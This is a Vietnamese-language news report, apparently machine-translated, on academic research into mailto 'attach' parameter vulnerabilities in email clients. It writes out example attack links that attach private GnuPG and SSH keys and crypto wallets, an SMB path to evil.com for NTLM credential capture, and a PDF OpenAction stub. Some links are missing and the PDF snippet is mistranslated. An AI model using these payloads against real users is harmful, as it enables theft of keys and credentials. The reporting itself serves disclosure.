Các nhà nghiên cứu từ Đại học Ruhr Bochum (Đức) () hành vi của ứng dụng thư khách khi xử lý liên kết “mailto:” với các tham số nâng cao. Năm trong số 20 ứng dụng email được kiểm tra có nguy cơ bị tấn công thao túng việc thay thế tài nguyên bằng tham số “đính kèm”. Thêm sáu ứng dụng email dễ bị tấn công thay thế khóa PGP và S/MIME, đồng thời ba ứng dụng khách dễ bị tấn công nhằm trích xuất nội dung của các tin nhắn được mã hóa.
Liên kết «"được sử dụng để tự động mở ứng dụng email nhằm viết thư cho người nhận được chỉ định trong liên kết. Ngoài địa chỉ, bạn có thể chỉ định các tham số bổ sung như một phần của liên kết, chẳng hạn như chủ đề của bức thư và mẫu cho nội dung điển hình. Cuộc tấn công được đề xuất thao túng tham số “đính kèm”, cho phép bạn đính kèm tệp đính kèm vào tin nhắn được tạo.
Các ứng dụng thư Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) và Pegasus Mail dễ bị tấn công bởi một cuộc tấn công tầm thường cho phép bạn tự động đính kèm bất kỳ tệp cục bộ nào, được chỉ định thông qua liên kết như “mailto:?attach=path_to_file”. Tệp được đính kèm mà không hiển thị cảnh báo nên nếu không đặc biệt chú ý, người dùng có thể không nhận thấy rằng thư sẽ được gửi kèm theo tệp đính kèm.
Ví dụ, sử dụng liên kết như "mailto:?to=user@example.com&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" bạn có thể chèn khóa riêng từ GnuPG vào thư. Bạn cũng có thể gửi nội dung của ví tiền điện tử (~/.bitcoin/wallet.dat), khóa SSH (~/.ssh/id_rsa) và bất kỳ tệp nào mà người dùng có thể truy cập. Hơn nữa, Thunderbird cho phép bạn đính kèm nhóm tệp theo mặt nạ bằng cách sử dụng các cấu trúc như "attach=/tmp/*.txt".
Ngoài các tệp cục bộ, một số ứng dụng email còn xử lý các liên kết đến bộ nhớ mạng và đường dẫn trong máy chủ IMAP. Đặc biệt, IBM Notes cho phép bạn chuyển một tập tin từ một thư mục mạng khi xử lý các liên kết như “attach=\\evil.com\dummyfile”, cũng như chặn các tham số xác thực NTLM bằng cách gửi liên kết đến máy chủ SMB do kẻ tấn công kiểm soát (yêu cầu sẽ được gửi cùng với người dùng tham số xác thực hiện tại).
Thunderbird xử lý thành công các yêu cầu như “đính kèm=imap:///fetch>UID>/INBOX>1/”, cho phép bạn đính kèm nội dung từ các thư mục trên máy chủ IMAP. Đồng thời, các tin nhắn được truy xuất từ IMAP, được mã hóa qua OpenPGP và S/MIME, sẽ được ứng dụng thư khách tự động giải mã trước khi gửi. Các nhà phát triển Thunderbird đã về vấn đề trong tháng Hai và trong vấn đề sự cố đã được khắc phục (các nhánh Thunderbird 52, 60 và 68 vẫn dễ bị tấn công).
Các phiên bản cũ của Thunderbird cũng dễ bị tổn thương trước hai biến thể tấn công khác trên PGP và S/MIME do các nhà nghiên cứu đề xuất. Đặc biệt, Thunderbird, cũng như OutLook, PostBox, eM Client, MailMate và R2Mail2, đã bị tấn công thay thế khóa, do ứng dụng thư khách tự động nhập và cài đặt các chứng chỉ mới được truyền trong tin nhắn S/MIME, cho phép kẻ tấn công tổ chức thay thế các khóa công khai đã được người dùng lưu trữ.
Cuộc tấn công thứ hai, mà Thunderbird, PostBox và MailMate dễ bị tấn công, thao túng các tính năng của cơ chế tự động lưu thư nháp và cho phép, sử dụng các tham số mailto, để bắt đầu giải mã các thư được mã hóa hoặc thêm chữ ký số cho các thư tùy ý, với sau đó truyền kết quả tới máy chủ IMAP của kẻ tấn công. Trong cuộc tấn công này, văn bản mã hóa được truyền qua tham số “body” và thẻ “meta Refresh” được sử dụng để bắt đầu cuộc gọi đến máy chủ IMAP của kẻ tấn công. Ví dụ: ' '
Để tự động xử lý các liên kết “mailto:” mà không cần sự tương tác của người dùng, có thể sử dụng các tài liệu PDF được thiết kế đặc biệt - hành động OpenAction trong PDF cho phép bạn tự động khởi chạy trình xử lý mailto khi mở tài liệu:
%PDF-1.5
1 0 đối tượng
<< /Type /Catalog /OpenAction [2 0 R] >>
endobj
2 0 đối tượng
<< /Type /Action /S /URI/URI (mailto:?body=——BẮT ĐẦU TIN NHẮN PGP——[…])>>
endobj
Nguồn: opennet.ru
